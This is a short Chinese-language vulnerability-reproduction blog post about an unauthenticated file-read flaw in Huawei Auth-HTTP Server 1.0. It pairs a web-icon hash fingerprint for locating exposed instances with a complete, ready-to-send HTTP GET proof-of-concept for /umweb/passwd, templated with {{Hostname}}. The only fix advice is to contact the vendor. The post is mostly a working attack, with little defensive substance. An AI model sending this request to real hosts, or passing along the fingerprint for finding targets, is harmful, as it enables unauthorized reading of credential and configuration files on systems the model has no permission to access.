【漏洞复现】华为Auth-Http服务文件读取漏洞

Nx01 产品简介

        Huawei Auth-HTTP Server 1.0 可以实现基于角色的访问控制,通过用户的身份认证和权限控制,确保只有经过授权的用户可以访问特定的资源和服务。它支持常见的身份认证协议和技术,如LDAP、RADIUS、TACACS+等,能够与企业现有的认证系统无缝集成,提供一致的认证体验。

Nx02 漏洞描述

       华为Auth-Http服务存在文件读取漏洞。访问umweb/passwd可以读取文件敏感信息。

Nx03 产品主页

        web.icon=="be2408ce4716a5cfc50dd0ada76619d6"

【漏洞复现】华为Auth-Http服务文件读取漏洞_第1张图片

Nx04 漏洞复现

POC:

GET /umweb/passwd HTTP/1.1
Host: {{Hostname}}
Connection: keep-alive
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9

【漏洞复现】华为Auth-Http服务文件读取漏洞_第2张图片

Nx05 修复建议

        建议联系软件厂商进行处理。

你可能感兴趣的:(【漏洞复现】,web安全)